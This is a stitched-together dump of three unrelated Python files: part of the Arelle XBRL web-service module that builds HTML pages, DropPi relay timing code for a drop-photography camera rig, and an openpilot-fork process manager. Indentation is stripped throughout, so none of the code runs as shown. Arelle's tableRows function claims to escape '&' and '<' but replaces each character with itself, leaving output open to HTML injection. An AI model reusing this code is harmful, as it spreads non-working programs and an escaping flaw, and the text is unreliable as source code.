<tr><td>© 2010-2015 Mark V Systems Limited. All rights reserved.</td></tr>
<tr><td>Web site: <a href="http://www.arelle.org">http://www.arelle.org</a>.
E-mail support: <a href="mailto:support@arelle.org">support@arelle.org</a>.</td></tr>
<tr><td>Licensed under the Apache License, Version 2.0 (the \"License\"); you may not use this file
except in compliance with the License. You may obtain a copy of the License at
<a href="http://www.apache.org/licenses/LICENSE-2.0">http://www.apache.org/licenses/LICENSE-2.0</a>.
Unless required by applicable law or agreed to in writing, software distributed under the License
is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and limitations under the License.</td></tr>
<tr><td>Includes:</td></tr>
<tr><td style="text-indent: 2.0em;">Python® %s.%s.%s © 2001-2010 Python Software Foundation</td></tr>
<tr><td style="text-indent: 2.0em;">PyParsing © 2003-2010 Paul T. McGuire</td></tr>
<tr><td style="text-indent: 2.0em;">lxml %s.%s.%s © 2004 Infrae, ElementTree © 1999-2004 by Fredrik Lundh</td></tr>
<tr><td style="text-indent: 2.0em;">Bottle © 2011 Marcel Hellkamp</td></tr>
</table>''') % (arelleImgFile or '/images/arelle32.gif',
cntlr.__version__,
cntlr.systemWordSize,
Version.version,
sys.version_info[0],sys.version_info[1],sys.version_info[2],
etree.LXML_VERSION[0],etree.LXML_VERSION[1],etree.LXML_VERSION[2]) )
def indexPageREST():
"""Index (default) web page for *get* requests to */*.
:returns: html - Web page of choices to navigate to */help* or */about*.
"""
return htmlBody(_('''<table width="700p">
<tr><th colspan="2">Arelle Web Services</th></tr>
<tr><td>/help</td><td>Help web page, web services API.</td></tr>
<tr><td>/about</td><td>About web page, copyrights, license, included software.</td></tr>
</table>'''))
def indexPageCGI():
"""Default web page response for *get* CGI request with no parameters.
:returns: html - Web page of choices to navigate to *?help* or *?about*.
"""
return htmlBody(_('''<table width="700p">
<tr><th colspan="2">Arelle CGI Services</th></tr>
<tr><td>?help</td><td>Help web page, CGI services.</td></tr>
<tr><td>?about</td><td>About web page, copyrights, license, included software.</td></tr>
<tr><td>REST API</td><td>The Arelle REST API is supported through CGI if the entire CGI path is wildcard-mapped to the arelleCmdLine executable.</td></tr>
</table>'''))
def htmlBody(body, script=""):
"""Wraps body html string in a css-styled html web page
:param body: Contents for the *<body>* element
:type body: html str
:param script: Script to insert in generated html web page (such as a timed reload script)
:type script: javascript str
:returns: html - Web page string of the styled page wrapping *body* (and optional *script*).
"""
return '''
<?xml version="1.0" encoding="utf-8"?>
<html xmlns="http://www.w3.org/1999/xhtml">
%s <head>
<STYLE type="text/css">
body, table, p {font-family:Arial,sans-serif;font-size:10pt;}
table {vertical-align:top;white-space:normal;}
th {background:#eee;}
td {vertical-align:top;}
.tableHdr{border-top:.5pt solid windowtext;border-right:none;border-bottom:none;border-left:.5pt solid windowtext;}
.cell{border-top:1.0pt solid windowtext;border-right:.5pt solid windowtext;border-bottom:.5pt solid windowtext;border-left:.5pt solid windowtext;}
.blockedCell{border-top:1.0pt solid windowtext;border-right:.5pt solid windowtext;border-bottom:.5pt solid windowtext;border-left:.5pt solid windowtext;background:#eee;}
</STYLE>
</head>
<body>
%s
</body>
</html>
''' % (script, body)
def tableRows(lines, header=None):
"""Wraps lines of text into a one-column table (for display of text results of operations, such as processing messages and status, to web browser).
Replaces any *&* with *&amp;* and *<* with *&lt;*.
:param lines: Sequence (list or tuple) of line strings.
:type lines: [str]
:param header: Optional header text for top row of table.
:type header: str
:returns: html - <table> html string.
"""
return '<table cellspacing="0" cellpadding="4">%s\n</table>' % (
("<tr><th>%s</th></tr>" % header if header else "") +
"\n".join("<tr><td>%s</td></tr>" % line.replace("&","&").replace("<","<") for line in lines))
def errorReport(errors, media="html"):
"""Wraps lines of error text into specified media type for return of result to a request.
:param errors: Sequence (list or tuple) of error strings.
:type errors: [str]
:param media: Type of result requested.
:type media: str
:returns: html or text - Error report in the requested media type.
"""
if media == "text":
response.content_type = 'text/plain; charset=UTF-8'
return '\n'.join(errors)
else:
response.content_type = 'text/html; charset=UTF-8'
return htmlBody(tableRows(errors, header=_("Messages")))
def multipartResponse(parts):
# call with ( (filename, contentType, content), ...)
boundary='----multipart-boundary-%s----' % (uuid.uuid1(),)
response.content_type = 'multipart/mixed; boundary=%s' % (boundary,)
buf = []
for filename, contentType, content in parts:
buf.append("\r\n" + boundary + "\r\n")
buf.append('Content-Disposition: attachment; filename="{0}";\r\n'.format(filename))
buf.append('Content-Type: {0};\r\n'.format(contentType))
buf.append('Content-Length: {0}\r\n'.format(len(content)))
buf.append('\r\n')
buf.append(content)
buf.append("\r\n" + boundary + "\r\n")
s = ''.join(buf)
response.content_length = len(s)
return s
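# Illustrative usage sketch for multipartResponse (file names and contents are
# assumptions): each part is a (filename, contentType, content) tuple, as the
# comment at the top of multipartResponse states.
def exampleMultipartUsage():
    parts = (("log.xml", "text/xml", "<log/>"),
             ("facts.csv", "text/csv", "label,value\nAssets,100\n"))
    return multipartResponse(parts)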
|
DropPiUI_Dropper.py
|
#!/usr/bin/python
"""*****************************************************************************************************************
DropPi by Kim Dalmeijer, 2021
Relay board 0: valve relays [VALVE1, VALVE2, VALVE3, VALVE4]
Relay board 1: flash and camera relays [CAM, FLASH1, FLASH2, FLASH3]
********************************************************************************************************************"""
from __future__ import print_function
import logging
import sys
import time
import ctypes
import threading
from DropPi_lib import *
# Load libc shared library:
libc = ctypes.CDLL('libc.so.6')
# General Definitions
DEF_FLASH_DELAY = 30 # (ms)
DEF_CAMERA_DELAY = 2500 # (ms)
MIRROR_LOCKUP = True
# Definitions of timings; these are defaults which will be set from the GUI before execution of the firing process.
# Each timing consists of the start time in ms and the duration in ms. Valve timings have up to 4 slots (4 drops);
# camera and flash timings have a single slot. An illustrative example of the structure follows the placeholders below.
# Timings for the valves (VALVE_1..VALVE_4)
TIMES_VALVE_1 = list()
TIMES_VALVE_2 = list()
TIMES_VALVE_3 = list()
TIMES_VALVE_4 = list()
TIME_CAMERA = 100  # camera start delay (ms); overwritten from the GUI via main()
TIME_FLASH = 0  # flash start delay (ms); overwritten from the GUI via main()
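# Illustrative example of the expected structure (values are assumptions, not
# shipped defaults): each valve list holds [start_ms, duration_ms] slots, one
# per drop, e.g. TIMES_VALVE_1 = [[0, 40], [120, 35]] fires two drops from
# valve 1; TIME_CAMERA and TIME_FLASH are single start delays in ms.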
# placeholders for elapsed thread times
v1_elapsed_time = 0
v2_elapsed_time = 0
v3_elapsed_time = 0
v4_elapsed_time = 0
c_elapsed_time = 0
f_elapsed_time = 0
def delayus(us):
""" Delay microseconds with libc usleep() using ctypes. """
libc.usleep(int(us))
# ------------------------------------
def thread_valve_1_function():
global v1_elapsed_time
start_time = time.perf_counter()
if MIRROR_LOCKUP:
delayus(700 * 1000)
for i in range(len(TIMES_VALVE_1)):
delayus(float(TIMES_VALVE_1[i][0]) * 1000)
relay_on(VALVE_1)
delayus(float(TIMES_VALVE_1[i][1]) * 1000)
relay_off(VALVE_1)
v1_elapsed_time = time.perf_counter() - start_time
def thread_valve_2_function():
global v2_elapsed_time
start_time = time.perf_counter()
if MIRROR_LOCKUP:
delayus(700 * 1000)
for i in range(len(TIMES_VALVE_2)):
delayus(float(TIMES_VALVE_2[i][0]) * 1000)
relay_on(VALVE_2)
delayus(float(TIMES_VALVE_2[i][1]) * 1000)
relay_off(VALVE_2)
v2_elapsed_time = time.perf_counter() - start_time
def thread_valve_3_function():
global v3_elapsed_time
start_time = time.perf_counter()
if MIRROR_LOCKUP:
delayus(700 * 1000)
for i in range(len(TIMES_VALVE_3)):
delayus(float(TIMES_VALVE_3[i][0]) * 1000)
relay_on(VALVE_3)
delayus(float(TIMES_VALVE_3[i][1]) * 1000)
relay_off(VALVE_3)
v3_elapsed_time = time.perf_counter() - start_time
def thread_valve_4_function():
global v4_elapsed_time
start_time = time.perf_counter()
if MIRROR_LOCKUP:
delayus(700 * 1000)
for i in range(len(TIMES_VALVE_4)):
delayus(float(TIMES_VALVE_4[i][0]) * 1000)
relay_on(VALVE_4)
delayus(float(TIMES_VALVE_4[i][1]) * 1000)
relay_off(VALVE_4)
v4_elapsed_time = time.perf_counter() - start_time
def thread_camera_function():
global c_elapsed_time
start_time = time.perf_counter()
if MIRROR_LOCKUP:
relay_on(CAMERA)
delayus(150 * 1000)
relay_off(CAMERA)
delayus(550 * 1000)
delayus(TIME_CAMERA * 1000)
relay_on(CAMERA)
delayus(DEF_CAMERA_DELAY * 1000)
relay_off(CAMERA)
c_elapsed_time = time.perf_counter() - start_time
def thread_flash_function(flash1, flash2, flash3):
global f_elapsed_time
start_time = time.perf_counter()
# WAIT FOR MIRROR LOCKUP IF NEEDED
if MIRROR_LOCKUP:
delayus(700 * 1000)
# TURN ON
delayus(float(TIME_FLASH) * 1000)
TMPFLASH_1 = FLASH_1 if flash1 else 0
TMPFLASH_2 = FLASH_2 if flash2 else 0
TMPFLASH_3 = FLASH_3 if flash3 else 0
relay_on(TMPFLASH_1, TMPFLASH_2, TMPFLASH_3)
# TURN OFF
delayus(DEF_FLASH_DELAY * 1000)
relay_off(TMPFLASH_1, TMPFLASH_2, TMPFLASH_3)
f_elapsed_time = time.perf_counter() - start_time
def main(**kwargs):
# do whatever and return 0 for success and an
# integer x, 1 <= x <= 256 for failure
logformat = '%(asctime)s.%(msecs)03d %(message)s'
logging.basicConfig(format=logformat, level=logging.INFO, datefmt='%H:%M:%S')
# set variables for this run from what the main has passed
global DEF_FLASH_DELAY
global DEF_CAMERA_DELAY
global TIME_CAMERA
global TIME_FLASH
global TIMES_VALVE_1
global TIMES_VALVE_2
global TIMES_VALVE_3
global TIMES_VALVE_4
global MIRROR_LOCKUP
global v1_elapsed_time
global v2_elapsed_time
global v3_elapsed_time
global v4_elapsed_time
global c_elapsed_time
global f_elapsed_time
DEF_FLASH_DELAY = float(kwargs['flash_def'])
logging.info("FLASH DELAY: %i", DEF_FLASH_DELAY)
DEF_CAMERA_DELAY = float(kwargs['cam_def'])
logging.info("CAMERA DELAY: %i", DEF_CAMERA_DELAY)
TIME_CAMERA = float(kwargs['cam_on'])
logging.info("CAMERA TIME: %i", TIME_CAMERA)
TIME_FLASH = float(kwargs['flash_on'])
logging.info("FLASH TIME: %i", TIME_FLASH)
MIRROR_LOCKUP = kwargs['mirror']
TIMES_VALVE_1 = kwargs['v1times']
TIMES_VALVE_2 = kwargs['v2times']
TIMES_VALVE_3 = kwargs['v3times']
TIMES_VALVE_4 = kwargs['v4times']
logging.info("DropPi : before creating threads")
thread_valve_1 = threading.Thread(target=thread_valve_1_function)
thread_valve_2 = threading.Thread(target=thread_valve_2_function)
thread_valve_3 = threading.Thread(target=thread_valve_3_function)
thread_valve_4 = threading.Thread(target=thread_valve_4_function)
thread_camera = threading.Thread(target=thread_camera_function)
thread_flash = threading.Thread(target=thread_flash_function, args=(
kwargs['flash1_on'], kwargs['flash2_on'], kwargs['flash3_on']))
logging.info("DropPi : before running threads")
thread_camera.start()
thread_valve_1.start()
thread_valve_2.start()
thread_valve_3.start()
thread_valve_4.start()
thread_flash.start()
logging.info("DropPi : waiting for all threads to finish")
thread_camera.join()
thread_valve_1.join()
thread_valve_2.join()
thread_valve_3.join()
thread_valve_4.join()
thread_flash.join()
logging.info("DropPi : all done")
# calculate error from the elapsed times and display the results to indicate how closely the run matched the requested timings
# if an elapsed time is zero, the valve or flash for that timing was not used
# V1 ERROR CALCULATION
calculated_elapsed_time = 0
if v1_elapsed_time != 0:
if MIRROR_LOCKUP:
calculated_elapsed_time += 700
for i in range(len(TIMES_VALVE_1)):
calculated_elapsed_time += float(TIMES_VALVE_1[i][0])
calculated_elapsed_time += float(TIMES_VALVE_1[i][1])
calculated_elapsed_time = calculated_elapsed_time / 1000
try:
calculated_error = ((calculated_elapsed_time - v1_elapsed_time) / calculated_elapsed_time) * 100
except ZeroDivisionError:
calculated_error = 0
logging.info(
f'Valve1 timings: real; {v1_elapsed_time:.4f},'
f' calculated; {calculated_elapsed_time},'
f' error; {abs(calculated_error):.1f}%')
# V2 ERROR CALCULATION
calculated_elapsed_time = 0
if v2_elapsed_time != 0:
if MIRROR_LOCKUP:
calculated_elapsed_time += 700
for i in range(len(TIMES_VALVE_2)):
calculated_elapsed_time += float(TIMES_VALVE_2[i][0])
calculated_elapsed_time += float(TIMES_VALVE_2[i][1])
calculated_elapsed_time = calculated_elapsed_time / 1000
try:
calculated_error = ((calculated_elapsed_time - v2_elapsed_time) / calculated_elapsed_time) * 100
except ZeroDivisionError:
calculated_error = 0
logging.info(
f'Valve2 timings: real; {v2_elapsed_time:.4f},'
f' calculated; {calculated_elapsed_time},'
f' error; {abs(calculated_error):.1f}%')
# V3 ERROR CALCULATION
calculated_elapsed_time = 0
if v3_elapsed_time != 0:
if MIRROR_LOCKUP:
calculated_elapsed_time += 700
for i in range(len(TIMES_VALVE_3)):
calculated_elapsed_time += float(TIMES_VALVE_3[i][0])
calculated_elapsed_time += float(TIMES_VALVE_3[i][1])
calculated_elapsed_time = calculated_elapsed_time / 1000
try:
calculated_error = ((calculated_elapsed_time - v3_elapsed_time) / calculated_elapsed_time) * 100
except ZeroDivisionError:
calculated_error = 0
logging.info(
f'Valve3 timings: real; {v3_elapsed_time:.4f},'
f' calculated; {calculated_elapsed_time},'
f' error; {abs(calculated_error):.1f}%')
# V4 ERROR CALCULATION
calculated_elapsed_time = 0
if v4_elapsed_time != 0:
if MIRROR_LOCKUP:
calculated_elapsed_time += 700
for i in range(len(TIMES_VALVE_4)):
calculated_elapsed_time += float(TIMES_VALVE_4[i][0])
calculated_elapsed_time += float(TIMES_VALVE_4[i][1])
calculated_elapsed_time = calculated_elapsed_time / 1000
try:
calculated_error = ((calculated_elapsed_time - v4_elapsed_time) / calculated_elapsed_time) * 100
except ZeroDivisionError:
calculated_error = 0
logging.info(
f'Valve4 timings: real; {v4_elapsed_time:.4f},'
f' calculated; {calculated_elapsed_time},'
f' error; {abs(calculated_error):.1f}%')
# CAMERA ERROR CALCULATION
calculated_elapsed_time = 0
if c_elapsed_time != 0:
if MIRROR_LOCKUP:
calculated_elapsed_time += 700
calculated_elapsed_time += float(TIME_CAMERA)
calculated_elapsed_time += float(DEF_CAMERA_DELAY)
calculated_elapsed_time = calculated_elapsed_time / 1000
try:
calculated_error = ((calculated_elapsed_time - c_elapsed_time) / calculated_elapsed_time) * 100
except ZeroDivisionError:
calculated_error = 0
logging.info(
f'Camera timings: real; {c_elapsed_time:.4f},'
f' calculated; {calculated_elapsed_time},'
f' error; {abs(calculated_error):.1f}%')
# FLASH ERROR CALCULATION
calculated_elapsed_time = 0
if f_elapsed_time != 0:
if MIRROR_LOCKUP:
calculated_elapsed_time += 700
calculated_elapsed_time += float(TIME_FLASH)
calculated_elapsed_time += float(DEF_FLASH_DELAY)
calculated_elapsed_time = calculated_elapsed_time / 1000
try:
calculated_error = ((calculated_elapsed_time - f_elapsed_time) / calculated_elapsed_time) * 100
except ZeroDivisionError:
calculated_error = 0
logging.info(
f'Flash timings: real; {f_elapsed_time:.4f},'
f' calculated; {calculated_elapsed_time},'
f' error; {abs(calculated_error):.1f}%')
return 0
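# Illustrative invocation sketch (all values are assumptions): roughly how a
# GUI front end is expected to call main(), since main() reads every keyword
# below and running the module bare would fail on the missing kwargs.
def example_run():
    return main(flash_def=30, cam_def=2500,           # delays in ms
                cam_on=100, flash_on=55,              # trigger start offsets in ms
                mirror=True,                          # wait 700 ms for mirror lockup
                flash1_on=True, flash2_on=False, flash3_on=False,
                v1times=[[0, 40], [120, 35]],         # [start_ms, duration_ms] per drop
                v2times=[], v3times=[], v4times=[])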
# Now see what we're supposed to do next
if __name__ == "__main__":
sys.exit(main())
|
manager.py
|
#!/usr/bin/env python3
import datetime
import os
import signal
import subprocess
import sys
import traceback
from multiprocessing import Process
import cereal.messaging as messaging
import selfdrive.crash as crash
from common.basedir import BASEDIR
from common.params import Params, ParamKeyType
from common.text_window import TextWindow
from selfdrive.boardd.set_time import set_time
from selfdrive.hardware import HARDWARE, PC, EON
from selfdrive.manager.helpers import unblock_stdout
from selfdrive.manager.process import ensure_running, launcher
from selfdrive.manager.process_config import managed_processes
from selfdrive.athena.registration import register, UNREGISTERED_DONGLE_ID
from selfdrive.swaglog import cloudlog, add_file_handler
from selfdrive.version import is_dirty, get_commit, get_version, get_origin, get_short_branch, \
terms_version, training_version, is_comma_remote
from selfdrive.hardware.eon.apk import system
sys.path.append(os.path.join(BASEDIR, "pyextra"))
def manager_init():
# update system time from panda
set_time(cloudlog)
# save boot log
#subprocess.call("./bootlog", cwd=os.path.join(BASEDIR, "selfdrive/loggerd"))
params = Params()
params.clear_all(ParamKeyType.CLEAR_ON_MANAGER_START)
default_params = [
("CompletedTrainingVersion", "0"),
("HasAcceptedTerms", "0"),
("OpenpilotEnabledToggle", "1"),
("CommunityFeaturesToggle", "1"),
("IsMetric", "1"),
# HKG
("UseClusterSpeed", "0"),
("LongControlEnabled", "0"),
("MadModeEnabled", "1"),
("IsLdwsCar", "0"),
("LaneChangeEnabled", "0"),
("AutoLaneChangeEnabled", "0"),
("SccSmootherSlowOnCurves", "0"),
("SccSmootherSyncGasPressed", "0"),
("StockNaviDecelEnabled", "0"),
("KeepSteeringTurnSignals", "0"),
("WarningOverSpeedLimit", "0"),
("DisableOpFcw", "0"),
("ShowDebugUI", "0"),
("NewRadarInterface", "0"),
]
if not PC:
default_params.append(("LastUpdateTime", datetime.datetime.utcnow().isoformat().encode('utf8')))
if params.get_bool("RecordFrontLock"):
params.put_bool("RecordFront", True)
if not params.get_bool("DisableRadar_Allow"):
params.delete("DisableRadar")
# set unset params
for k, v in default_params:
if params.get(k) is None:
params.put(k, v)
# is this dashcam?
if os.getenv("PASSIVE") is not None:
params.put_bool("Passive", bool(int(os.getenv("PASSIVE"))))
if params.get("Passive") is None:
raise Exception("Passive must be set to continue")
# Create folders needed for msgq
try:
os.mkdir("/dev/shm")
except FileExistsError:
pass
except PermissionError:
print("WARNING: failed to make /dev/shm")
# set version params
params.put("Version", get_version())
params.put("TermsVersion", terms_version)
params.put("TrainingVersion", training_version)
params.put("GitCommit", get_commit(default=""))
params.put("GitBranch", get_short_branch(default=""))
params.put("GitRemote", get_origin(default=""))
# set dongle id
reg_res = register(show_spinner=True)
if reg_res:
dongle_id = reg_res
else:
serial = params.get("HardwareSerial")
raise Exception(f"Registration failed for device {serial}")
os.environ['DONGLE_ID'] = dongle_id # Needed for swaglog
if not is_dirty():
os.environ['CLEAN'] = '1'
cloudlog.bind_global(dongle_id=dongle_id, version=get_version(), dirty=is_dirty(),
device=HARDWARE.get_device_type())
if is_comma_remote() and not (os.getenv("NOLOG") or os.getenv("NOCRASH") or PC):
crash.init()
crash.bind_user(id=dongle_id)
crash.bind_extra(dirty=is_dirty(), origin=get_origin(), branch=get_short_branch(), commit=get_commit(),
device=HARDWARE.get_device_type())
def manager_prepare():
for p in managed_processes.values():
p.prepare()
def manager_cleanup():
# send signals to kill all procs
for p in managed_processes.values():
p.stop(block=False)
# ensure all are killed
for p in managed_processes.values():
p.stop(block=True)
cloudlog.info("everything is dead")
def manager_thread():
if EON:
Process(name="shutdownd", target=launcher, args=("selfdrive.shutdownd", "shutdownd")).start()
system("am startservice com.neokii.optool/.MainService")
Process(name="road_speed_limiter", target=launcher, args=("selfdrive.road_speed_limiter", "road_speed_limiter")).start()
cloudlog.bind(daemon="manager")
cloudlog.info("manager start")
cloudlog.info({"environ": os.environ})
params = Params()
ignore = []
if params.get("DongleId", encoding='utf8') == UNREGISTERED_DONGLE_ID:
ignore += ["manage_athenad", "uploader"]
if os.getenv("NOBOARD") is not None:
ignore.append("pandad")
if os.getenv("BLOCK") is not None:
ignore += os.getenv("BLOCK").split(",")
ensure_running(managed_processes.values(), started=False, not_run=ignore)
started_prev = False
sm = messaging.SubMaster(['deviceState'])
pm = messaging.PubMaster(['managerState'])
while True:
sm.update()
not_run = ignore[:]
if sm['deviceState'].freeSpacePercent < 5:
not_run.append("loggerd")
started = sm['deviceState'].started
driverview = params.get_bool("IsDriverViewEnabled")
ensure_running(managed_processes.values(), started, driverview, not_run)
# trigger an update after going offroad
if started_prev and not started and 'updated' in managed_processes:
os.sync()
managed_processes['updated'].signal(signal.SIGHUP)
started_prev = started
running = ' '.join("%s%s\u001b[0m" % ("\u001b[32m" if p.proc.is_alive() else "\u001b[31m", p.name)
for p in managed_processes.values() if p.proc)
print(running)
cloudlog.debug(running)
# send managerState
msg = messaging.new_message('managerState')
msg.managerState.processes = [p.get_process_state_msg() for p in managed_processes.values()]
pm.send('managerState', msg)
# Exit main loop when uninstall/shutdown/reboot is needed
shutdown = False
for param in ("DoUninstall", "DoShutdown", "DoReboot"):
if params.get_bool(param):
cloudlog.warning(f"Shutting down manager - {param} set")
shutdown = True
if shutdown:
break
def main():
prepare_only = os.getenv("PREPAREONLY") is not None
manager_init()
# Start UI early so prepare can happen in the background
if not prepare_only:
managed_processes['ui'].start()
manager_prepare()
if prepare_only:
return
# SystemExit on sigterm
signal.signal(signal.SIGTERM, lambda signum, frame: sys.exit(1))
try:
manager_thread()
except Exception:
traceback.print_exc()
crash.capture_exception()
finally:
manager_cleanup()
params = Params()
if params.get_bool("DoUninstall"):
cloudlog.warning("uninstalling")
HARDWARE.uninstall()
elif params.get_bool("DoReboot"):
cloudlog.warning("reboot")
HARDWARE.reboot()
elif params.get_bool("DoShutdown"):
cloudlog.warning("shutdown")
HARDWARE.shutdown()
if __name__ == "__main__":
unblock_stdout()
try:
main()
except Exception:
add_file_handler(cloudlog)
cloudlog.exception("Manager failed to start")
# Show last 3 lines of traceback
error = traceback.format_exc(-3)
error = "Manager failed to start\n\n" + error
with TextWindow(error) as t:
t.wait_for_exit()
raise
# manual exit because we are forked
sys.exit(0)
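# Illustrative note (assumptions throughout; requires a full openpilot
# environment with params, cereal and hardware support): the manager's
# behaviour is steered by environment variables read above, e.g.
#
#   PREPAREONLY=1   only run manager_init()/manager_prepare(), then exit
#   NOBOARD=1       skip starting pandad
#   BLOCK=a,b       comma-separated list of managed processes never to start
#   PASSIVE=1       run as a dashcam (sets the Passive param)
#
# so something like `PREPAREONLY=1 BLOCK=loggerd,uploader ./manager.py` would
# exercise prepare-only mode without starting the blocked processes.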
|